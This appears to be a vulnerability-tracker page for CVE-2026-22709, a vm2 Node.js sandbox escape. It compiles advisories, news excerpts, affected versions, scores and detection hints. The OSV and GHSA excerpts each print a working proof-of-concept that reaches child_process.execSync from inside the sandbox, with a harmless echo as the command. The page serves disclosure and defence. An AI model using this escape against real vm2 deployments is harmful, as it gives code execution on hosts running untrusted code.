CVE-2026-22709
published 2026-01-26CVE-2026-22709: vm2 is an open source vm/sandbox for Node.js. In vm2 prior to version 3.10.2, `Promise.prototype.then` `Promise.prototype.catch` callback sanitization can be…
PriorityP265critical10CVSS 3.1
AVNACLPRNUINSCCHIHAH
EPSS
1.22%
64.9th percentile
vm2 is an open source vm/sandbox for Node.js. In vm2 prior to version 3.10.2, `Promise.prototype.then` `Promise.prototype.catch` callback sanitization can be bypassed. This allows attackers to escape the sandbox and run arbitrary code. In lib/setup-sandbox.js, the callback function of `localPromise.prototype.then` is sanitized, but `globalPromise.prototype.then` is not sanitized. The return value of async functions is `globalPromise` object. Version 3.10.2 fixes the issue.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ansible-automation-platform | automation-portal | — | — |
| patriksimek | vm2 | < 3.11.0 | 3.11.0 |
| rhdh | rhdh-hub-rhel9 | — | — |
| vm2_project | vm2 | < 3.11.0 | 3.11.0 |
| vm2_project | vm2 | < 3.10.2 | 3.10.2 |
| vm2_project | vm2 | >= 0 < 3.10.2 | 3.10.2 |
| vm2_project | vm2 | >= 0 < 3.11.0 | 3.11.0 |
Detection & IOCsextracted from sources · hover to see the quote
- →The exploit path involves a Promise constructor triggering an unhandled rejection that propagates to the host process — monitor for unhandled rejection events originating from vm2 sandbox contexts ↗
- →The executor-to-unhandledRejection path was NOT patched in v3.10.2; only .then()/.catch() onRejected callbacks were sanitized — detection logic should cover the Promise executor path as well ↗
- →Vulnerable vm2 versions are 3.10.0 through 3.10.5 (prior to 3.11.0); flag use of these specific npm package versions in software inventories and CI/CD pipelines ↗
- →CVE-2026-22709 is described as trivial to exploit; prioritize detection of vm2 sandbox usage in internet-facing SaaS platforms, online code runners, and chatbots where untrusted code execution is permitted ↗
- ·The partial fix in vm2 v3.10.1 and the tightened fix in v3.10.2 only addressed .then()/.catch() callback sanitization; the executor-to-unhandledRejection path remained unpatched until v3.11.0 — detection rules targeting only .then()/.catch() bypass patterns will miss this vector ↗
- ·Red Hat packages rhdh/rhdh-hub-rhel9 (Red Hat Developer Hub) and ansible-automation-platform/automation-portal (Self-service automation portal 2) were listed as under investigation for this CVE at time of publication ↗
CVSS provenance
nvdv3.110.0CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
ghsa10.0CRITICAL
vendor_redhat10.0CRITICAL
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
vm2: vm2: Sandbox escape leads to Denial of Service
vendor_redhat·2026-05-13·CVSS 10.0
CVE-2026-44001 [CRITICAL] CWE-248 vm2: vm2: Sandbox escape leads to Denial of Service
vm2: vm2: Sandbox escape leads to Denial of Service
vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.0, a sandbox escape vulnerability in vm2 v3.10.5 allows any sandboxed code to crash the host Node.js process via a single Promise constructor that triggers an unhandled rejection propagating to the host. The fix for CVE-2026-22709 (v3.10.2) only sanitized the onRejected callback in .then() and .catch() overrides and did not address the executor-to-unhandledRejection path. This vulnerability is fixed in 3.11.0.
A flaw was found in vm2 (before 3.11.0). Sandboxed code can crash the host Node.js process via a Promise constructor that triggers an unhandled rejection propagating to the host; the CVE-2026-22709 fix only sanitized .then()/.catch() callbacks, not the executor path. Fixe
GHSA
vm2 has a Sandbox Escape via Promise Constructor Unhandled Rejection (Process Crash DoS)
ghsa·2026-05-07·CVSS 10.0
CVE-2026-44001 [CRITICAL] CWE-248 vm2 has a Sandbox Escape via Promise Constructor Unhandled Rejection (Process Crash DoS)
vm2 has a Sandbox Escape via Promise Constructor Unhandled Rejection (Process Crash DoS)
### Summary
A sandbox escape vulnerability in vm2 v3.10.5 allows any sandboxed code to crash the host Node.js process via a single Promise constructor that triggers an unhandled rejection propagating to the host. The fix for CVE-2026-22709 (v3.10.2) only sanitized the `onRejected` callback in `.then()` and `.catch()` overrides and did not address the executor-to-unhandledRejection path.
### Details
When sandboxed code creates a `Promise` whose executor sets `Error.name` to a `Symbol()` and then accesses `.stack`, V8's internal `FormatStackTrace` (C++) attempts `Symbol.toString()`, which throws a **host-realm TypeError**. Because this error originates inside the Promise executor and no `.catch()` hand
OSV
vm2 has a Sandbox Escape
osv·2026-01-26
CVE-2026-22709 [CRITICAL] vm2 has a Sandbox Escape
vm2 has a Sandbox Escape
In vm2 for version 3.10.0, `Promise.prototype.then` `Promise.prototype.catch` callback sanitization can be bypassed. This allows attackers to escape the sandbox and run arbitrary code.
```js
const { VM } = require("vm2");
const code = `
const error = new Error();
error.name = Symbol();
const f = async () => error.stack;
const promise = f();
promise.catch(e => {
const Error = e.constructor;
const Function = Error.constructor;
const f = new Function(
"process.mainModule.require('child_process').execSync('echo HELLO WORLD!', { stdio: 'inherit' })"
);
f();
});
`;
new VM().run(code);
```
In lib/setup-sandbox.js, the callback function of `localPromise.prototype.then` is sanitized, but `globalPromise.prototype.then` is not sanitized. The return value of async functio
GHSA
vm2 has a Sandbox Escape
ghsa·2026-01-26
CVE-2026-22709 [CRITICAL] CWE-693 vm2 has a Sandbox Escape
vm2 has a Sandbox Escape
In vm2 for version 3.10.0, `Promise.prototype.then` `Promise.prototype.catch` callback sanitization can be bypassed. This allows attackers to escape the sandbox and run arbitrary code.
```js
const { VM } = require("vm2");
const code = `
const error = new Error();
error.name = Symbol();
const f = async () => error.stack;
const promise = f();
promise.catch(e => {
const Error = e.constructor;
const Function = Error.constructor;
const f = new Function(
"process.mainModule.require('child_process').execSync('echo HELLO WORLD!', { stdio: 'inherit' })"
);
f();
});
`;
new VM().run(code);
```
In lib/setup-sandbox.js, the callback function of `localPromise.prototype.then` is sanitized, but `globalPromise.prototype.then` is not sanitized. The return value of async functio
No detection rules found.
No public exploits indexed.
Hackernews
vm2 Node.js Library Vulnerabilities Enable Sandbox Escape and Arbitrary Code Execution
blogs_hackernews·2026-05-07·CVSS 10.0
CVE-2026-24118 [CRITICAL] vm2 Node.js Library Vulnerabilities Enable Sandbox Escape and Arbitrary Code Execution
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## vm2 Node.js Library Vulnerabilities Enable Sandbox Escape and Arbitrary Code Execution
A dozen critical security vulnerabilities have been disclosed in the vm2 Node.js library that could be exploited by bad actors to break out of the sandbox and execute arbitrary code on susceptible systems.
vm2 is an open-source library used to run untrusted JavaScript code inside a secure sandbox by intercepting and proxying JavaScript objects to prevent sandboxed code from accessing the host environment.
The security flaws are listed below -
CVE-2026-24118 (CVSS score: 9.8) - A vulnerability that allows sandbox escape via "__lookupGette
Bleepingcomputer
Critical vm2 sandbox bug lets attackers execute code on hosts
blogs_bleepingcomputer·2026-05-06·CVSS 9.8
CVE-2026-26956 [CRITICAL] Critical vm2 sandbox bug lets attackers execute code on hosts
## Critical vm2 sandbox bug lets attackers execute code on hosts
## Bill Toulas
A critical vulnerability in the popular Node.js sandboxing library vm2 allows escaping the sandbox and executing arbitrary code on the host system.
The security issue is tracked as CVE-2026-26956 and has been confirmed to impact vm2 version 3.10.4, although earlier releases may also be vulnerable. Proof-of-concept (PoC) exploit code has been published.
In the security advisory, the maintainer says that the issue only impacts environments with Node.js 25 (confirmed on Node.js 25.6.1) that have enabled WebAssembly exception handling and JSTag support.
vm2 is an open-source Node.js library used to run untrusted JavaScript code inside a restricted sandbox environment. It is commonly employed by online coding p
Bleepingcomputer
Critical sandbox escape flaw found in popular vm2 NodeJS library
blogs_bleepingcomputer·2026-01-27·CVSS 9.8
CVE-2026-22709 [CRITICAL] Critical sandbox escape flaw found in popular vm2 NodeJS library
## Critical sandbox escape flaw found in popular vm2 NodeJS library
## Bill Toulas
A critical-severity vulnerability in the vm2 Node.js sandbox library, tracked as CVE-2026-22709, allows escaping the sandbox and executing arbitrary code on the underlying host system.
The open-source vm2 library creates a secure context to allow users to execute untrusted JavaScript code that does not have access to the filesystem.
vm2 has historically been seen in SaaS platforms that support user script execution, online code runners, chatbots, and open-source projects, being used in more than 200,000 projects on GitHub. The project was discontinued in 2023, though, due to repeated sandbox-escape vulnerabilities, and considered unsafe for running untrusted code.
Last October, maintainer Patrik Šimek d
Wiz
CVE-2026-22709 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-22709 [CRITICAL] CVE-2026-22709 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22709 :
JavaScript vulnerability analysis and mitigation
Promise.prototype.then
Promise.prototype.catch
localPromise.prototype.then
globalPromise.prototype.then
globalPromise
Source : NVD
## 10
Score
Published January 26, 2026
Severity CRITICAL
CNA Score 9.8
High-profile Vulnerability Yes
Affected Technologies
JavaScript
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
vm2
Sources
NVD
npm Severity CRITICAL Has Fix Added at: Jan 27, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Ja
Bugzilla
CVE-2026-44001 vm2: vm2: Sandbox escape leads to Denial of Service
bugzilla·2026-05-13·CVSS 10.0
CVE-2026-44001 [CRITICAL] CVE-2026-44001 vm2: vm2: Sandbox escape leads to Denial of Service
CVE-2026-44001 vm2: vm2: Sandbox escape leads to Denial of Service
vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.0, a sandbox escape vulnerability in vm2 v3.10.5 allows any sandboxed code to crash the host Node.js process via a single Promise constructor that triggers an unhandled rejection propagating to the host. The fix for CVE-2026-22709 (v3.10.2) only sanitized the onRejected callback in .then() and .catch() overrides and did not address the executor-to-unhandledRejection path. This vulnerability is fixed in 3.11.0.
2026-01-26
Published